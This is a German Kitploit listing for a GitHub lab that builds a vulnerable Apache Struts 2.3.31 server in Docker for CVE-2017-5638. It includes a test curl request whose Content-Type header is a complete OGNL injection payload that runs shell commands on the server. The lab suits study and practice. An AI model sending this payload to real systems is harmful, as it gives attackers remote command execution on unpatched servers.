Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vulnerability_struts-2.3.31 — Erstellen Sie die struts-2.3.31-Umgebung (CVE-2017-5638) | Kitploit
Tools/GitHubGitHub/testpilot031/vulnerability_struts-2.3.31
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubtestpilot031/vulnerability_struts-2.3.31

vulnerability_struts-2.3.31

Erstellen Sie die struts-2.3.31-Umgebung (CVE-2017-5638)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 JahrenNoch nicht geprüft

vulnerability_struts-2.3.31

Erstellen Sie die struts-2.3.31 (CVE-2017-5638) Umgebung. HTTPS-Anfragen sind möglich.

Umgebung

Ubuntu 20.04 Docker 20.10.12 curl 7.68.0

Server starten

Wir verwenden das Docker-Image tomcat:7.0-jre8. Entpacken Sie struts-2.3.31.zip in ein Verzeichnis Ihrer Wahl. cd struts-2.3.31 sudo docker build -t struts/2_3_31 . sudo docker run -it --rm -p 8443:8443 struts/2_3_31

Testanfrage

eins (erwartet 200OK) curl --location --request GET 'https://127.0.0.1:8443/struts2-showcase/showcase.action' -k -I

zweiter (erwartet 200OK) curl --location --request GET 'https://127.0.0.1:8443/struts2-showcase/showcase.action' --header 'Content-Type: %{(#_='''multipart/form-data''').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['''com.opensymphony.xwork2.ActionContext.container''']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='''ls''').(#iswin=(@java.lang.System@getProperty('''os.name''').toLowerCase().contains('''win'''))).(#cmds=(#iswin?{'''cmd.exe''','''/c''',#cmd}:{'''/bin/bash''','''-c''',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' -k

Details

struts2-showcase.war wird unten heruntergeladen: https://archive.apache.org/dist/struts/2.3.31/

server.xml ist die Tomcat-Konfigurationsdatei. Sie wurde für die SSL-Aktivierung bearbeitet.

Tool herunterladen